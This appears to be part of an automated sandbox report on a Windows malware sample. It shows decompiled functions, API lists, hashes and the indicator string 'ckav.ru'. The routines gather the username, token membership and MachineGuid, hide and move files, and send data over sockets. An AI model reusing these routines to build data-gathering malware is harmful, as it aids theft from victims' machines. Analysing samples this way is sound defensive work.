                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                              • String ID: ckav.ru
                                              • API String ID: 2915393847-2696028687
                                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                              0x00406340
                                              0x00406345
                                              0x00406373
                                              0x00406373
                                              0x00406347
                                              0x0040634f
                                              0x00406354
                                              0x00406357
                                              0x0040635c
                                              0x00406366
                                              0x0040636d
                                              0x00000000
                                              0x00406368
                                              0x00406368
                                              0x00406368
                                              0x00406366
                                              0x0040637a

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateNameProcessUser_wmemset
                                              • String ID: CA
                                              • API String ID: 2078537776-1052703068
                                              • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                              • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                              0x00406094
                                              0x004060a8
                                              0x004060ab

                                              APIs
                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InformationToken
                                              • String ID: IDA
                                              • API String ID: 4114910276-365204570
                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                              0x00402c10
                                              0x00402c15
                                              0x00402c1b
                                              0x00402c1e

                                              APIs
                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: s1@
                                              • API String ID: 190572456-427247929
                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                              0x00404a56
                                              0x00404a65
                                              0x00404a6a
                                              0x00404ad1
                                              0x00404ad1
                                              0x00404a6c
                                              0x00404a71
                                              0x00404a79
                                              0x00404a85
                                              0x00404a9a
                                              0x00404a9e
                                              0x00404acb
                                              0x00000000
                                              0x00404aa0
                                              0x00404aac
                                              0x00404abc
                                              0x00404ac1
                                              0x00404ac6
                                              0x00404ac6
                                              0x00404a9e
                                              0x00404ad9

                                              APIs
                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 1425999871-0
                                              • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                              • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 40%
                                              			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                              0x004060c6
                                              0x004060d5
                                              0x004060d8
                                              0x004060f4
                                              0x004060f6
                                              0x004060fb
                                              0x0040610a
                                              0x00406115
                                              0x0040611c
                                              0x0040611e
                                              0x00406121
                                              0x00000000
                                              0x0040612a
                                              0x0040612f

                                              APIs
                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CheckMembershipToken
                                              • String ID:
                                              • API String ID: 1351025785-0
                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                              0x00403c68
                                              0x00403c70
                                              0x00403c78
                                              0x00403c82
                                              0x00403c8b
                                              0x00403c8f
                                              0x00403c72
                                              0x00403c76
                                              0x00403c76

                                              APIs
                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateDirectory
                                              • String ID:
                                              • API String ID: 4241100979-0
                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                              0x0040643c
                                              0x00406445
                                              0x00406454

                                              APIs
                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                              0x00404eed
                                              0x00404ef2
                                              0x00404efd
                                              0x00404efd
                                              0x00404f07
                                              0x00404f0e

                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                              0x00403bdd
                                              0x00403beb
                                              0x00403bee

                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                              0x0040428a
                                              0x00404297
                                              0x0040429a

                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                              0x00404a27
                                              0x00404a35
                                              0x00404a38

                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                              0x00403c4d
                                              0x00403c55
                                              0x00403c58

                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                              • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                              • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                              0x00403c15
                                              0x00403c1d
                                              0x00403c20

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                              0x00402c2c
                                              0x00402c34
                                              0x00402c37

                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                              0x00403bfc
                                              0x00403c04
                                              0x00403c07

                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                              0x00403bc4
                                              0x00403bcc
                                              0x00403bcf

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                              0x00404a0d
                                              0x00404a15
                                              0x00404a18

                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                              • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                              0x00403b72
                                              0x00403b7a
                                              0x00403b7d

                                              APIs
                                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID:
                                              • API String ID: 1174141254-0
                                              • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                              • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                              • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                              Uniqueness

                                              Uniqueness Score: -1.00%

